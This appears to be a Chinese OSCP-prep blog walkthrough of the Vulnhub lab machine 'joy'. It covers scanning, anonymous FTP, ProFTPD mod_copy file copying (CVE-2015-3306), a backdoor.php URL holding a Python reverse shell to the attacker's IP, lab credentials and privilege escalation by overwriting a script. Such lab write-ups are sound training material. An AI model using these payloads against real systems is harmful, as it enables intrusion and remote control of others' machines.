OSCP备考_0x17_Vulnhub靶机_joy

Ethan医生4个月前靶场134
名称说明
靶机下载链接
攻击机(kali)ip:192.168.233.168
靶机(CentOS)ip:192.168.233.184


arp-scan 192.168.233.1/24


image.png

nmap -p- 192.168.233.184  

image.png

nmap -p21,22,25,80,110,139,143,445,465,587,993,995 -A -T4 192.168.233.184


image.png


http://192.168.233.184/ossec/

gobuster dir -u http://192.168.233.184/ossec -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html

image.png


上面说明了21端口可以使用Anonymous尝试看看能不能找到啥点


image.png

image.png

reminder打开没啥用,另外一个名称Patrick

image.png

我们可以看到一个版本号的文件,但是它存在于patrick路径中,我们是没有权限去获取的,所以尝试将其转移到/upload路径中

image.png

image.png

可以看下有没有啥漏洞                                                                                                                                                                                                      

searchsploit ProFTPD ,36742


image.png



telnet和ftp命令的区别:

telnet连接后,用户主机实际成为远程TELNET服务器的一个虚拟终端(或称是哑终端),一切服务完全在远程服务器上执行,但用户决不能从远程服务器中下载或上传文件,或拷贝文件到用户主机中来。

ftp则不同,它是采用客户机/服务器模式,用户能够操作FTP服务器中的目录,上传或下载文件,但用户不能请求服务器执行某个文件。


复制version_control文件到/home/ftp/upload目录

site cpfr /home/patrick/version_control

site cpto /home/ftp/upload/version_control

image.png

image.png

image.png

image.png


https://github.com/t0kx/exploit-CVE-2015-3306/blob/master/exploit.py

有些时后kali内的挡案无法使用可以查看github上的

http://192.168.233.184/backdoor.php后门直接反弹WEBSHELL

image.png


http://192.168.233.184/backdoor.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.233.168%22,3333));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27


image.png

找到root密码,但是无法直接切换

image.png

image.png

切换patrick,

credentials for JOY:

patrick:apollo098765

root:howtheheckdoiknowwhattherootpasswordis

image.png

image.png

遇到权限问题看怎样可以覆盖挡案

image.png

将刚刚生成的test上传到FTP在使用FTP去覆盖挡案

site cpfr /home/ftp/upload/test

site cpto /home/patrick/script/test

image.png

再次登入拿root权限

image.png

执行的时后最好到自己的home/patrick目录下使用

标签: OSCP

相关文章

OSCP备考_0x52_HackThBox靶机_Windows_Buff

OSCP备考_0x52_HackThBox靶机_Windows_Buff

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.25.107 (扫描TCP)打开8080然后就是使用EXP然后就获取到SHELL然后EA...

OSCP备考_0x50_HackThBox靶机_Windows_SecNotes

OSCP备考_0x50_HackThBox靶机_Windows_SecNotes

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.243.247 (扫描TCP)http://10.129.243.247/home.ph...

OSCP备考_0x54_HackThBox靶机_Windows_remote

OSCP备考_0x54_HackThBox靶机_Windows_remote

OSCP备考_0x54_HackThBox靶机_Windows_remotenmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.230.172&nbs...

OSCP备考_0x19_Vulnhub靶机_symfonos: 2

OSCP备考_0x19_Vulnhub靶机_symfonos: 2

名称说明靶机下载链接https://www.vulnhub.com/entry/symfonos-2,331/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.1...

 OSCP备考_0x15_HackThBox靶机_Linux_networked

OSCP备考_0x15_HackThBox靶机_Linux_networked

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.201 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x23_HackThBox靶机_Linux_mango

OSCP备考_0x23_HackThBox靶机_Linux_mango

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.108.26 (扫描TCP)nmap -sU --top-ports 100 ...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。